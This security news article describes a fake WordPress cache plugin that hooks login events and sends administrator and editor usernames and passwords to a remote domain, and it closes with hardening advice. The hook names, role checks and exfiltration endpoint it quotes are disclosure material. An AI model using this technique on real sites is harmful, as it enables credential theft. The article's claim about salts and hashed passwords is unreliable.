WordPress Admins Cautioned About Fake Cache Plugin Stealing Admin Credentials

A newly identified malicious plugin, dubbed “wp-runtime-cache,” has been discovered targeting WordPress sites with a sophisticated method to steal admin credentials.

Disguised as a caching plugin, this malware lurks in the wp-content/plugins directory, evading detection by hiding from the WordPress admin panel’s plugin list.

Unlike legitimate caching plugins that typically offer visible settings or management options within the wp-admin interface, this fake plugin offers no such features, raising immediate suspicion during routine malware scans.

On closer inspection, the plugin directory contains just a single file, wp-runtime-cache.php, a stark contrast to the multi-file structure of authentic plugins, signaling malicious intent.

How the Malware Operates

Technical analysis reveals a chillingly effective mechanism. The plugin activates during site login events via the add_action('wp_login', 'octopusJson50286', 10, 2) hook, capturing user input as the site loads.

It specifically targets high-privilege users by checking for roles like “manage_options” (admin-level) and “edit_pages” (editor-level), decoded from embedded base64 strings.

If the logged-in user matches these roles, the plugin constructs an array of sensitive data, including usernames and passwords, and exfiltrates it to a remote server at https://woocommerce-check[.]com/report-to using WordPress’s built-in wp_remote_post function.

The plugin further conceals its presence with a secondary function triggered by add_action('pre_current_active_plugins', 'pbes2PITR0339'), which manipulates the plugin list to remain invisible to non-malicious users.

Code obfuscation techniques, such as random variable names like infiltrateDocumentStore0460 and base64-encoded content, are employed, distinguishing it from legitimate obfuscation used in premium plugins for license protection.

The domain used for data exfiltration, registered on October 27, 2024, in Arkansas, US, with a Hong Kong-based abuse contact number (+852.68584411), suggests a deliberate attempt to obscure the attackers’ origins.

Such freshly registered domains are a common tactic among cybercriminals to bypass reputation-based detection systems.

Protecting Your WordPress Site

According to the Report, This attack underscores the critical need for proactive security measures. WordPress administrators must regularly audit plugins and user accounts, leveraging server-side scanners or security plugins like Sucuri to detect unauthorized file uploads.

Implementing two-factor authentication (2FA) and IP-based login restrictions can thwart unauthorized access even if credentials are compromised.

Additionally, updating WordPress salts in the wp-config.php file post-compromise is vital new salts, easily generated via WordPress.org’s Salt Generator, invalidate previously captured hashed passwords, preventing attackers from decrypting them.

This incident serves as a stark reminder of the evolving sophistication of cyber threats and the importance of layered defenses to safeguard critical site access.

Staying vigilant and maintaining updated security protocols can mean the difference between a secure site and a catastrophic breach.

To Upgrade Your Cybersecurity Skills, Take Diamond Membership With 150+ Practical Cybersecurity Courses Online – Enroll Here